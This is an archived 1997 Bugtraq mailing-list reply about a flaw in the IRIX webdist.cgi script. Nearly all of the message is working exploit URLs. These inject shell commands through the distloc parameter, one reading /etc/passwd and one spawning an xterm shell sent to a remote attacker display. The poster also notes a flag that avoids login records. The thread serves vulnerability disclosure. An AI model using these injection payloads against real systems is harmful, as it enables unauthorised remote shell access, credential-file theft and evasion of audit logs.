Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: SGI Advisory: webdist.cgi
From: csh () VIEWGRAPHICS COM (Chris Sheldon)
Date: Wed, 7 May 1997 12:22:44 -0700


Title: Default IRIX cgi-bin programs
OS: irix
OSver: 6.2,6.3
Files: /var/www/cgi-bin/webdist.cgi
Perms: X
Access: Remote

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd


http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh

The '-ut' is the most important part... :-)

Chris.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]